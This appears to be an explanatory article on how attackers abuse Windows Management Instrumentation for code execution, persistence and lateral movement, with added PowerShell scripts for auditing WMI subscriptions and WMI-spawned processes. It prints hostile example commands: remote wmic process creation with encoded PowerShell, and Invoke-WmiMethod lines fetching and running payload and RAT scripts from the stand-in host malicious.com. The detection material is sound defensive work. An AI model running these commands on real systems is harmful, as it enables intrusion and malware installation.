WMI Code Execution

Windows Management Instrumentation (WMI) is a versatile and powerful administrative framework included in Windows operating systems, providing an interface for accessing and managing system information, configuring settings, and automating various administrative tasks. While these capabilities are invaluable for system administrators, they also present opportunities for cybercriminals to execute malicious code, establish persistence, and conduct a range of other malicious activities.

WMI Event Subscriptions

WMI event subscriptions consist of three primary components:

  • Event Filter: Defines the conditions under which the event should trigger.

  • Event Consumer: Specifies the actions to take when the event occurs.

  • Filter-Consumer Binding: Links the event filter to the consumer, ensuring that the specified actions are executed when the event is triggered.

Attackers exploit this functionality to create persistent backdoors and trigger malicious actions based on specific system events.

Examples of Malicious WMI Event Subscriptions

  • Triggering Malware Execution: Attackers set up an event subscription to execute malware when a specific application, such as a web browser or email client, is launched.

  • Data Exfiltration: An event subscription can be configured to exfiltrate data when certain files are accessed or modified.

  • Automated Attacks: Attackers can configure events to launch attacks when a user logs in or logs out, or in response to network connections or disconnections.
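To audit a host for the three components described above, here is an added example (not code from the original page) that enumerates the permanent event subscriptions in the root\subscription namespace, resolves each binding to its filter and consumer, and flags the consumer classes that execute a command line or script. It assumes Windows PowerShell 5.1 (Get-WmiObject was removed in PowerShell 7) and an elevated session.

```powershell
# Added example (not code from the original page): list every permanent WMI event
# subscription on the local host and flag the consumer classes that execute code.
# Assumes Windows PowerShell 5.1 (Get-WmiObject was removed in PowerShell 7) and an
# elevated session. Permanent subscriptions live in the root\subscription namespace.

$ns = 'root\subscription'
# Consumer classes that run an arbitrary command line or script when the filter fires.
$codeConsumers = @('CommandLineEventConsumer', 'ActiveScriptEventConsumer')

function Get-WmiPersistence {
    $filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
    $consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer   # returns all subclasses
    $bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Filter/Consumer are object paths such as __EventFilter.Name="X"; strip any
        # \\host\namespace: prefix so they compare against each object's __RELPATH.
        $filterPath   = $b.Filter   -replace '^[^:]*:'
        $consumerPath = $b.Consumer -replace '^[^:]*:'
        $filter   = $filters   | Where-Object { $_.__RELPATH -eq $filterPath }
        $consumer = $consumers | Where-Object { $_.__RELPATH -eq $consumerPath }
        $consumerClass = ($consumerPath -split '\.')[0]

        # What actually runs when the filter fires, for the code-executing classes.
        # A dangling binding (consumer object missing) simply yields an empty payload.
        $payload = switch ($consumerClass) {
            'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
            'ActiveScriptEventConsumer' { if ($consumer.ScriptText) { $consumer.ScriptText } else { $consumer.ScriptFileName } }
            default                     { $null }
        }

        [pscustomobject]@{
            FilterName    = $filter.Name
            FilterQuery   = $filter.Query      # WQL, e.g. an __InstanceCreationEvent on Win32_Process
            ConsumerClass = $consumerClass
            ConsumerName  = $consumer.Name
            ExecutesCode  = $codeConsumers -contains $consumerClass
            Payload       = $payload
        }
    }
}

# Code-executing bindings first. A clean host normally shows only the built-in
# "SCM Event Log Filter" -> NTEventLogEventConsumer binding, which executes nothing.
Get-WmiPersistence | Sort-Object ExecutesCode -Descending | Format-List
```

For continuous monitoring rather than a point-in-time audit, Sysmon records filter, consumer and binding creation as Event IDs 19, 20 and 21, and on Windows 10 and later the Microsoft-Windows-WMI-Activity/Operational log records new permanent consumer registrations as Event ID 5861.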

Process Execution via WMI

Attackers leverage WMI's capability to execute processes both locally and remotely to achieve various malicious objectives. This ability to execute arbitrary code on target systems can be used for initial compromise, lateral movement, maintaining persistence, and more.

WMIC.exe

WMIC.exe is the command-line interface for WMI, allowing users to perform WMI operations through a command prompt. Attackers often use WMIC.exe to run commands that can control local or remote systems. This tool provides a straightforward way for attackers to leverage WMI's powerful functionalities.

Examples of Malicious Use:

  • Reconnaissance: Attackers can run commands like wmic process list to gather information about running processes on a system. This can help them understand what applications are in use and identify potential vulnerabilities or targets for further exploitation.

  • Remote Code Execution: Commands such as wmic /node:"target_ip" process call create "cmd.exe /c powershell -encodedcommand <encoded_command>" enable attackers to execute scripts on remote systems. This method allows attackers to spread their reach within a network, deploying payloads or commands without needing physical access to the target systems.

  • System Configuration: Changing system settings or configurations, for example, wmic service where (name='ServiceName') call startservice. This command can be used to start or stop services, modify their configurations, or even disable critical security services, thus compromising the system’s integrity and defenses.

PowerShell Cmdlets

PowerShell provides several cmdlets that interact with WMI, such as Invoke-WmiMethod, Get-WmiObject, and Set-WmiInstance. These cmdlets allow for extensive interaction with the WMI infrastructure, enabling a wide range of operations that can be exploited for malicious purposes.

Examples of Malicious Use:

  • Process Creation: Using Invoke-WmiMethod to create processes, e.g., Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c calc.exe". This can be used to run any executable on the target system, including malware.

  • Gathering Information: Using Get-WmiObject to query system information, e.g., Get-WmiObject -Class Win32_Process to list all running processes. Attackers use this to gather detailed information about the system’s state, installed software, and running services, which can inform their next steps.

  • Modifying System State: Using Set-WmiInstance to change system configurations, such as modifying user account settings. This can include creating new administrative accounts, changing permissions, or altering configurations to facilitate further attacks.

Programmatic Interfaces

Native code in C++ (through the COM-based WMI API) and managed code on .NET can call WMI directly, offering even more powerful and flexible ways to execute processes and perform other WMI operations. By embedding WMI functionality into custom malware, attackers can create sophisticated threats that are harder to detect and mitigate.

Examples of Malicious Use:

  • Custom Malware: Writing custom malware that uses WMI APIs to execute payloads or gather information, e.g., a C++ application using the IWbemServices interface to execute commands. This allows for precise control over the target system and can integrate WMI capabilities into broader malware functionality.

  • Advanced Persistence: Using .NET to create complex, stealthy backdoors that interact with WMI, e.g., embedding WMI queries and method calls within the .NET code to evade detection. Such backdoors can be designed to trigger under specific conditions, making them highly resilient and difficult to remove.

Malicious Process Execution

Deploying Payload Droppers

WMI can be used to drop additional malware onto the system. An attacker might use a command to execute a payload dropper that downloads and runs a secondary payload. This technique is particularly effective because it allows attackers to introduce new malicious components without direct interaction with the system’s file system, often evading traditional antivirus measures.

Example Command:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -command 'Invoke-WebRequest -Uri http://malicious.com/payload.exe -OutFile C:\payload.exe; Start-Process C:\payload.exe'"

This command demonstrates how an attacker can use WMI to run a PowerShell command that downloads a malicious payload from a remote server and then executes it. This method is commonly used to install various types of malware, including ransomware, spyware, or additional loaders.

Executing Remote Administration Tools (RATs)

Attackers often deploy RATs to maintain control over compromised systems. WMI commands can be used to install and execute these tools remotely, providing persistent access and control over the infected systems.

Example Command:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -command 'iex (New-Object Net.WebClient).DownloadString('http://malicious.com/rat.ps1')'"

This command starts a PowerShell process that downloads and executes a remote administration tool script directly from a malicious server. RATs allow attackers to perform a wide range of activities, from stealing data and capturing keystrokes to taking control of the system’s camera and microphone.
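Every execution path on this page, whether wmic "process call create", Invoke-WmiMethod against Win32_Process, or a direct IWbemServices call, ends in the Win32_Process.Create method, and the child process is started under the WMI provider host WmiPrvSE.exe. The following added example (not code from the original page) uses that parent-child relationship to surface WMI-spawned processes both from the live process table and from Sysmon's process-creation events, flagging command lines that match the download-and-execute patterns shown in the example commands above. It assumes an elevated session; the historical view assumes Sysmon is installed and logging Event ID 1.

```powershell
# Added example (not code from the original page): find processes spawned through WMI.
# Win32_Process.Create (wmic "process call create", Invoke-WmiMethod, IWbemServices)
# starts the child under the provider host WmiPrvSE.exe, so cmd.exe or powershell.exe
# with WmiPrvSE.exe as its parent is what to review. Assumes an elevated session; the
# historical view assumes Sysmon is installed and logging process creation (Event ID 1).
# The pattern is drawn from this page's example commands; it is a starting point only.
$suspiciousPattern = '-enc(odedcommand)?\s|\biex\b|DownloadString|Invoke-WebRequest'

function Get-WmiSpawnedProcess {
    # Point-in-time view from Win32_Process. Caveat: ParentProcessId is only a number;
    # if the parent has exited and its PID was reused, the link is unreliable.
    $procs   = Get-CimInstance -ClassName Win32_Process
    $hostIds = @($procs | Where-Object Name -eq 'WmiPrvSE.exe' | ForEach-Object ProcessId)
    foreach ($p in $procs) {
        if ($hostIds -contains $p.ParentProcessId) {
            [pscustomobject]@{
                Source = 'Live'; Time = $p.CreationDate; Image = $p.ExecutablePath
                CommandLine = $p.CommandLine
                Suspicious  = [bool]($p.CommandLine -match $suspiciousPattern)
            }
        }
    }
}

function Get-WmiSpawnedProcessFromSysmon {
    param([int]$Days = 7)
    $events = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1
        StartTime = (Get-Date).AddDays(-$Days)
    }
    foreach ($e in $events) {
        # Sysmon puts its fields in EventData; turn them into a name -> value table.
        $d = @{}
        ([xml]$e.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        if ($d.ParentImage -like '*\WmiPrvSE.exe') {
            [pscustomobject]@{
                Source = 'Sysmon'; Time = $e.TimeCreated; Image = $d.Image
                CommandLine = $d.CommandLine
                Suspicious  = [bool]($d.CommandLine -match $suspiciousPattern)
                User        = $d.User    # the account the child runs as
            }
        }
    }
}

@(Get-WmiSpawnedProcess) + @(Get-WmiSpawnedProcessFromSysmon) |
    Sort-Object Suspicious, Time -Descending | Format-Table -AutoSize -Wrap
```

Legitimate management tooling (SCCM, monitoring agents) also spawns children under WmiPrvSE.exe, so treat the parent relationship as a triage filter and the command-line match as the escalation signal.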
